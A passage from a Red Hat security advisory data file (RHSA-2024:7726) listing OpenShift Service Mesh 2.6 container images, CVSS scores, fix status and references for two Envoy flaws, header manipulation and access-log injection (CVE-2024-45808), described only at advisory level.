"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.4, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "envoy: Potential to manipulate `x-envoy` headers from external sources", }, { cve: "CVE-2024-45808", cwe: { id: "CWE-117", name: "Improper Output Neutralization for Logs", }, discovery_date: "2024-09-20T00:40:26.266584+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2313685", }, ], notes: [ { category: "description", text: "A flaw was found in envoy. Affected versions of envoy may allow malicious attackers to inject unexpected content into access logs. This is achieved by exploiting the lack of validation for the `REQUESTED_SERVER_NAME` field for access loggers.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Malicious log injection via access logs", title: "Vulnerability summary", }, { category: "other", text: "The vulnerability in Envoy that allows attackers to inject unexpected content into access logs is classified as moderate severity rather than important because the impact is primarily related to log integrity rather than direct exploitation of the system or data breaches, which lowers the overall risk profile. While log tampering can lead to misleading information, it does not directly compromise the application’s functionality or security boundaries. Additionally, the attack requires specific conditions to succeed, relying on the lack of validation for the `REQUESTED_SERVER_NAME` field, which may not be present in all configurations.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45808", }, { category: "external", summary: "RHBZ#2313685", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313685", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45808", url: "https://www.cve.org/CVERecord?id=CVE-2024-45808", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45808", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45808", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-p222-xhp9-39rc", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-p222-xhp9-39rc", }, ], release_date: "2024-09-20T00:15:02.733000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", 